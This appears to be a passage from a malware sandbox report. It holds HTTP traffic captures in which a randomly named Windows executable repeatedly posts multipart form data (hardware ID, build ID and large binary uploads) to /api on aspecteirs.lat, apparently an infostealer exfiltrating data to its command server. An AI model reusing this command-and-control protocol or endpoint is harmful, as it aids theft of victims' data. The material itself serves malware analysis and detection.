                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=75YtutT5Y8o04IolGe2k7Q7kL6qfE1jx6nXvd0KqrQV%2Bss0c1dhOpZzlUaBWp6Vj9lbiFwMAcJ9ibtpfNPeRcZnJ6MftSSpmMJsIOWK5Pw8UMqQ2cOZq32PmT2KrpRPYPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b276dd5d42d0-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1734&rtt_var=677&sent=12&recv=15&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9731&delivery_rate=1583514&cwnd=207&unsent_bytes=0&cid=ed0fd77f817f2b1c&ts=822&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:21:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          31192.168.2.449937104.21.66.854437112C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:43 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=EQHNF6YZ
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 20380
                                                                                                                                                                                                                                                          Host: aspecteirs.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:43 UTC15331OUTData Raw: 2d 2d 45 51 48 4e 46 36 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 51 48 4e 46 36 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 51 48 4e 46 36 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 45 51 48 4e 46 36 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                                          Data Ascii: --EQHNF6YZContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--EQHNF6YZContent-Disposition: form-data; name="pid"3--EQHNF6YZContent-Disposition: form-data; name="lid"CVmr0t--installs--EQHNF6YZContent-Dispo
                                                                                                                                                                                                                                                          2024-12-19 13:21:43 UTC5049OUTData Raw: 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc
                                                                                                                                                                                                                                                          Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                                                                                                                                                                                          2024-12-19 13:21:44 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:44 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=5ln3ke2ivu3gq3p6euck1rh428; expires=Mon, 14 Apr 2025 07:08:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BbmxoHubzra8eD7XSVgPDBUORdGKt33PdTuMxYsRf1DMSh7jn5aFBjY94iGzQuCX%2FJQeQUOMxJOka%2BlSQdkSL3Fpt4PV9ky%2BztFCyjYIVdTNVVFV1MrxCKUX4QDxx2N7VQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b2879aae0fa4-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1503&rtt_var=573&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21330&delivery_rate=1893644&cwnd=176&unsent_bytes=0&cid=1fe222af67e6eb22&ts=952&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:21:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          32192.168.2.449947104.21.66.854437112C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:47 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=YONWSTA3SCMY
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                                                                          Host: aspecteirs.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:47 UTC1245OUTData Raw: 2d 2d 59 4f 4e 57 53 54 41 33 53 43 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 4f 4e 57 53 54 41 33 53 43 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 4f 4e 57 53 54 41 33 53 43 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 59 4f 4e 57 53 54 41 33 53 43 4d
                                                                                                                                                                                                                                                          Data Ascii: --YONWSTA3SCMYContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--YONWSTA3SCMYContent-Disposition: form-data; name="pid"1--YONWSTA3SCMYContent-Disposition: form-data; name="lid"CVmr0t--installs--YONWSTA3SCM
                                                                                                                                                                                                                                                          2024-12-19 13:21:48 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:47 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=olorcj5od7dcl65pqopdh5uuha; expires=Mon, 14 Apr 2025 07:08:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzVWvtUnqOFO2ADuGebSbqhOr3iw7x2U53a63XWhQWNHOYl0QYvmUbNRyslmVEAudL7g4UCJyKB2xm0ybcYs3V6vdLEPmfXf4KnSG%2BhtHZVi0sCpilrzBxg7gpEuic4TCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b2a04c9e43bf-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1564&rtt_var=602&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2154&delivery_rate=1795817&cwnd=252&unsent_bytes=0&cid=a08e1e3e31196252&ts=758&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:48 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:21:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          33192.168.2.449957104.21.66.854437112C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=RKUHZXWDNHR5VS0UE
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 575719
                                                                                                                                                                                                                                                          Host: aspecteirs.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: 2d 2d 52 4b 55 48 5a 58 57 44 4e 48 52 35 56 53 30 55 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 4b 55 48 5a 58 57 44 4e 48 52 35 56 53 30 55 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 4b 55 48 5a 58 57 44 4e 48 52 35 56 53 30 55 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73
                                                                                                                                                                                                                                                          Data Ascii: --RKUHZXWDNHR5VS0UEContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--RKUHZXWDNHR5VS0UEContent-Disposition: form-data; name="pid"1--RKUHZXWDNHR5VS0UEContent-Disposition: form-data; name="lid"CVmr0t--installs
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: 9d a5 98 06 a8 ff 76 53 a8 1d 70 3c b6 d8 66 e0 fc 2c ca 27 29 80 e1 bb a1 5f d0 da b6 78 17 e8 a6 0f 67 af ec e0 b9 a0 55 3c ca 59 88 12 69 52 75 7d e0 b1 1b a2 f8 3a ab cc 70 19 28 b2 6d fb f3 65 3b 14 79 16 d5 19 a7 4c b7 17 eb 49 d4 e2 75 ce 33 31 38 49 8b 6b fb ce 1c 95 71 7b ae a4 15 e3 0f fb 78 a3 ea 36 cd b2 70 aa 3f df a7 a4 a8 ed ac e6 2c 18 44 1e 8f b9 3b b3 af 45 1b c2 ce ad bd 52 83 ca 1a 7d 13 21 37 8c c4 02 3d 09 45 ef c8 08 af 50 00 84 f2 1b 13 b6 0b 3f 9a c4 3e f1 6d e7 3c 58 c8 ac 98 47 91 7d 90 ca 1a 1b 5c d4 38 a5 84 81 67 2f 29 b7 a8 63 11 55 c8 fa fa a8 f4 f3 ce 46 89 27 e7 ab 97 67 07 f0 0e 95 07 c7 18 ca f4 9a 43 4b ac 14 9a c5 88 63 3c 58 fa f8 d5 50 0e 2c 45 8d 09 9e b4 83 3d fe 85 fd fe bf a5 9a 1a 68 10 bb c5 47 3f 03 e8 12 98
                                                                                                                                                                                                                                                          Data Ascii: vSp<f,')_xgU<YiRu}:p(me;yLIu318Ikq{x6p?,D;ER}!7=EP?>m<XG}\8g/)cUF'gCKc<XP,E=hG?
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: 27 e6 71 ef 4c 6d 9c 77 21 21 50 a2 a0 cb 4a 16 2e 96 4f 45 f0 1e ec 64 3f 40 b5 19 30 3a 90 03 52 66 79 80 fa 84 34 da 4f d5 2c 33 91 6d 53 9a 4d fe ae c3 35 df 42 9e 9d 70 66 79 e5 36 47 f9 38 98 c6 20 65 be 38 52 71 ef ef 13 1f 8f a6 88 74 8a 7e db 38 7c 0f bc af 17 24 2d 0a 0a a6 5d 8e 09 7e 33 15 b5 94 b2 7c a5 8e 9c 0e b9 f2 1a 88 e0 85 e9 7d d7 1d aa ac 30 10 34 bd 5a ad b4 19 87 60 84 03 c2 f1 dc 38 fc c6 af 26 35 cd 0c 63 1d e9 fe 8b 5a ae b6 c1 f1 a3 d5 c5 ed f5 75 c6 61 8f 95 08 5f a0 fa 4f 20 fa 87 84 77 e9 3a 4b 02 da c7 e6 a5 28 8b 4e 42 1f 45 a2 2d 55 7c f1 6f ae 11 79 b6 bc 05 4a 71 97 7b 32 fd b1 1a 58 f0 f5 fe 13 58 75 ca 65 4d dc d0 76 36 a9 3a 20 af 62 21 22 76 10 2d a8 c7 58 a8 d9 09 67 be 77 34 9c cb c8 d0 fa 52 4f 2f f3 40 93 c9 35
                                                                                                                                                                                                                                                          Data Ascii: 'qLmw!!PJ.OEd?@0:Rfy4O,3mSM5Bpfy6G8 e8Rqt~8|$-]~3|}04Z`8&5cZua_O w:K(NBE-U|oyJq{2XXueMv6: b!"v-Xgw4RO/@5
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: 1e c7 d2 6a ae 52 44 c0 98 b1 32 0e 84 5e 6a a2 d1 6a 03 c5 19 76 35 c5 35 5e 47 8e 69 62 1c a5 34 56 e3 0e 05 74 bc 00 e4 03 5b b2 0b 79 83 fe 73 26 e9 97 91 00 fb 52 9c 67 37 23 7a 7b 99 66 45 b3 15 05 2f d6 96 89 f3 41 ae ef ff 4c 7f 32 10 38 a8 56 38 22 57 38 2c fe f8 ae 28 8e db 7f 8d b6 e7 48 4e df 53 d7 dd 03 0a 7c 6f 4b f5 1b c4 f9 06 f6 92 3e 85 f2 cb 9c a0 59 c7 e7 16 f6 c6 6c b5 4b 5e bb 5d f7 fa 9d 65 d8 38 b1 d8 18 0a 7e 59 c1 18 ec af 3d b3 0a 91 bb 00 fd ce 3e 69 3d a5 7d 98 c1 a9 df 5c 61 a7 35 45 92 8e 04 c5 ae 6b 6e 8f 0c 70 41 ea 06 ec 40 04 58 ff e7 45 e5 61 04 15 75 ff a3 97 56 03 38 7e f1 d7 d9 f1 cb a1 c4 c2 f7 b8 5d 8f cf f9 0c 43 fd 81 2d 01 cc a6 bd 07 ab a5 80 db 45 7a 57 13 54 f4 83 68 56 81 23 f3 7f df 9d db 15 d0 d5 f4 1f e3
                                                                                                                                                                                                                                                          Data Ascii: jRD2^jjv55^Gib4Vt[ys&Rg7#z{fE/AL28V8"W8,(HNS|oK>YlK^]e8~Y=>i=}\a5EknpA@XEauV8~]C-EzWThV#
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: ed 76 89 1e 46 15 03 42 ed 1f 85 ad df 50 7d 12 f3 36 bd 07 f4 39 87 ff cd b4 89 25 0a db 8a 05 e5 ec 43 31 3d 40 01 3e e7 07 ff 3e 72 13 9c e9 e8 cd 09 24 51 e6 c4 b6 12 7e 17 d8 75 19 b9 12 da fa 23 9d 74 a2 cf cf 51 f9 3a 7e 2c c1 98 77 3a 73 ab a9 84 e9 f1 c4 12 3b 33 d9 f4 35 ee df 61 fa f9 a5 d4 13 f4 84 79 d8 8d 91 03 bb 76 a1 2c 2f 3f c0 1e 89 fc 5f a4 0d 7b 48 8d 79 bb 9c e5 33 eb f3 73 6b 79 d9 fd d1 62 99 81 e0 dc 5f 4a 05 c0 3b f1 dd 9b 54 c0 21 cf da 45 7a 46 e4 fc 11 8f 57 39 2e 9b a2 77 90 74 36 83 b0 2b 5b 1d 36 18 1c 3a fe 4f 83 fe df 05 7e 6d 8f ef 68 bb 73 88 43 ff 9d b8 b3 05 c0 57 11 f6 0e 39 5d f7 a9 62 13 cf 7f 03 be d9 b6 7f 75 60 67 60 d7 f6 b0 14 44 7e 3b 76 95 ac dc b0 35 6c 3c c7 8d ba 7d 56 47 5e 96 a2 2d e6 e1 44 09 bb 9f 20
                                                                                                                                                                                                                                                          Data Ascii: vFBP}69%C1=@>>r$Q~u#tQ:~,w:s;35ayv,/?_{Hy3skyb_J;T!EzFW9.wt6+[6:O~mhsCW9]bu`g`D~;v5l<}VG^-D
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: 47 f7 83 bc 3e 0e 93 08 ee a2 31 82 55 95 eb cb 8f 05 e4 22 05 7a a2 d6 d2 15 d1 0c 9b 08 16 19 30 ae 2a d1 fe 78 d2 e7 08 55 d4 93 c6 12 90 9b 5a 56 c1 cd a3 da 08 f7 42 d9 ec 07 ea 86 4e f7 53 7d ac 57 8e 7c 00 be 9f 0f 53 a7 f2 2a b7 d7 65 de 97 0c f3 97 45 cf c4 a1 9b 99 eb f6 75 ae 3a 20 61 f5 dd c8 08 74 b5 b1 d7 5e 0f 3d 7f ba 29 1a 64 a1 43 e6 75 ba e9 e6 77 a9 93 40 7d 0f d4 32 8b 28 db 09 80 e1 44 89 af 9f 96 de 9a 41 b6 16 33 b2 f1 72 d2 b6 93 7f d3 df b5 2f 32 01 35 fa 83 eb d9 c8 e7 d5 b8 79 5e b9 e0 6d 36 1e 23 7b 6b 36 27 7d 2d b5 d5 e3 33 2e f1 6b 41 81 e4 6c 3b 52 7d 48 2f a7 73 bf d5 3d 6a 30 7c 86 89 06 cd 25 9c 89 5f bb ea 5c 6f 4a ce 89 08 57 c9 a4 9e 57 89 21 07 8d 08 52 bf c0 a7 e7 ee 45 dc 14 db c0 b2 5b 7f 21 60 6d 2c 22 ab 08 8c
                                                                                                                                                                                                                                                          Data Ascii: G>1U"z0*xUZVBNS}W|S*eEu: at^=)dCuw@}2(DA3r/25y^m6#{k6'}-3.kAl;R}H/s=j0|%_\oJWW!RE[!`m,"
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: 5a 8f 1d 94 06 4f 38 e8 e7 24 62 0f 5d b5 08 34 c5 f3 d6 91 02 73 80 83 ee ea f9 e0 e3 5a 34 be f6 a3 65 c3 64 e3 df 31 4a f8 cd bf fe 5d 99 e9 9b 64 6e 76 56 f2 36 f8 e3 e8 fd dc 51 de 9e 57 a1 cb 5c 41 10 7d 25 50 41 e5 84 2a f8 bc 48 75 40 6c b4 73 80 fd fd e8 d5 37 82 60 e6 2a 0e 30 6f f1 a2 dc cf 72 48 11 02 25 21 44 bd 8f 80 95 e4 c4 07 9f 9e be c3 3b dd db 29 36 d5 80 85 3b c3 fd 8e 03 ea d8 18 1a 96 4d 2f 06 c9 13 1a 78 af c6 79 73 4e 90 ed ca 95 18 95 6b af 2e 11 a5 d1 5f 7f 6d 94 bf f2 7b ff aa f1 47 cb 67 f4 ad de b0 75 23 0a 5f a8 80 f0 a1 e2 98 b8 a7 eb 4f a4 d7 35 c2 3f fc f5 f4 dd c4 7c b8 86 89 ee 3e 1e ac 26 26 f3 b0 b0 f5 a5 49 88 d5 ae 15 43 ff ad 71 57 39 a0 80 bb 19 98 f6 37 94 7d 0c 3b df 7f b0 ed 00 e0 fc 1e b1 f8 5f 0d a0 f4 60 eb
                                                                                                                                                                                                                                                          Data Ascii: ZO8$b]4sZ4ed1J]dnvV6QW\A}%PA*Hu@ls7`*0orH%!D;)6;M/xysNk._m{Ggu#_O5?|>&&ICqW97};_`
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: 9f d7 4a c1 1a 9f d2 04 d8 bd 17 71 e6 34 0b eb db 1d 19 bf 04 8f d1 a4 bf 99 c1 00 22 51 be d1 88 64 b0 62 8f 10 e7 7b de 99 66 47 88 42 da 12 34 80 b0 8b 77 50 54 26 1c 24 50 1e 02 1b 45 1a 06 f8 af e2 21 17 89 81 db 59 da 3b ce ee 30 cb ce 2c e7 48 80 db b4 dd ac ce 7d 39 ef 19 1f d6 c3 6f a5 2f 0c 7d 78 4d 9e de b0 8d c9 a4 da 8d 6d 76 62 ab 7f 5b ba d1 f7 6d 57 00 fc f7 ca 08 9a 0b cb 7c 00 94 1e c8 24 35 98 a4 fa de a9 21 54 10 76 90 9b 0b 6c 54 6a 75 b9 96 20 b9 66 89 b9 0b 8d 7e 3f 99 54 04 64 79 df ef 1f 65 ae 2c 8a 0d 03 26 58 21 20 6f fb 6d 42 6c 65 81 96 aa d2 3b 9b d6 4e d4 29 f1 ad 23 42 37 4e e3 12 ac 4c 14 c4 a0 46 fd b4 b0 7e 94 76 8e cf 90 04 e8 b8 55 60 c0 d2 00 67 f4 8e c5 36 a9 16 9a 58 04 e2 47 6a a6 f6 76 ac d3 c4 d0 cf 7a f2 cf e6
                                                                                                                                                                                                                                                          Data Ascii: Jq4"Qdb{fGB4wPT&$PE!Y;0,H}9o/}xMmvb[mW|$5!TvlTju f~?Tdye,&X! omBle;N)#B7NLF~vU`g6XGjvz
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: cd 7c 90 4c 3a 72 53 10 48 fe 79 f5 bc 6c aa 47 a5 e7 97 4c 41 63 c4 ba b3 01 17 8d 59 e7 ee a7 e9 05 a0 c8 15 f6 94 a4 cd ec df 27 aa 07 44 80 d5 01 d2 cc ff 39 ce 96 a4 80 cb c0 fe c2 43 3b ff f5 d7 d8 4e 14 df 94 a3 fb 78 a0 94 22 2f 0a eb bd d1 44 9e 95 be 78 85 d1 15 61 24 e3 38 c6 3d 14 b6 ae 4b 24 52 c8 7f 2b 7a 19 6f 59 1f b2 72 87 da ee 14 7c f9 1d 3d 2c 7e 24 4a a6 08 ce 69 31 d5 13 e5 b0 e9 27 cb f2 43 d4 bb 15 4a 91 43 2d 09 6f d5 75 5f fb af cb 3b 6f 13 01 1e c6 6f b7 26 27 73 bf 42 0c 75 f3 50 a0 f7 10 50 32 d3 aa 3b ab ca b5 30 d7 44 11 b6 f3 09 3b 09 ef 2e d2 01 ad 8a b4 d5 7c f3 f7 51 d3 76 d0 20 96 28 ba 97 44 27 2a b8 6d 6a b9 d5 42 83 9f d1 de aa 6b 36 e7 32 a5 a8 1f 23 a8 b7 ee 30 44 09 b8 9f db 13 31 a4 0b 30 e0 10 93 61 00 4f 01 59
                                                                                                                                                                                                                                                          Data Ascii: |L:rSHylGLAcY'D9C;Nx"/Dxa$8=K$R+zoYr|=,~$Ji1'CJC-ou_;oo&'sBuPP2;0D;.|Qv (D'*mjBk62#0D10aOY
                                                                                                                                                                                                                                                          2024-12-19 13:21:51 UTC15331OUTData Raw: ae 84 65 ca 83 a1 5f e1 cf 09 d7 77 51 57 d6 c9 1e 3f d2 9c 1e 54 1d 95 62 f5 3f 2c 3c 21 12 fa 09 62 5a 23 c0 a6 7d 31 1a 0f 77 81 b6 e2 60 29 96 56 a1 82 21 26 f4 c2 ca 3e 47 ba e5 f3 87 55 31 d2 0b 1d 74 78 05 0c cb 6d 01 29 b9 78 fc 0e c9 2d 32 9e e8 f6 1b a3 f7 b4 0a 7a 9c 43 f6 86 ac fd 4e 2a 34 53 0c 3e 50 11 fa ed ef 0c af 03 81 08 44 82 5d 6f be 96 a2 80 c5 37 d8 2e dd 85 4b d1 1b f8 54 fe 8f f4 ab 02 af ec 41 79 10 f8 c2 19 b0 6c 47 1c 2f f3 4c 01 b3 17 e3 d5 25 b9 19 80 03 7c bc 63 44 ea 15 6e 88 e2 e6 5a 70 84 cd ac b2 e4 3d c7 a2 2e 2d 21 24 bf b0 6a ff c8 48 da 3d 81 78 d5 b0 9e 36 91 9c af b4 5d 69 72 b1 c9 a4 d7 1a 28 3e 4c d8 f9 d5 2e 47 a9 aa fe 03 2a 24 5d 8c da f5 4f d9 07 0f f7 26 45 d0 fe 93 89 ac 90 06 39 e1 e3 af 23 de 20 c0 1e 54
                                                                                                                                                                                                                                                          Data Ascii: e_wQW?Tb?,<!bZ#}1w`)V!&>GU1txm)x-2zCN*4S>PD]o7.KTAylG/L%|cDnZp=.-!$jH=x6]ir(>L.G*$]O&E9# T
                                                                                                                                                                                                                                                          2024-12-19 13:21:53 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:53 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=9ab6dbr64q6dmrn9r29ujro0f6; expires=Mon, 14 Apr 2025 07:08:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
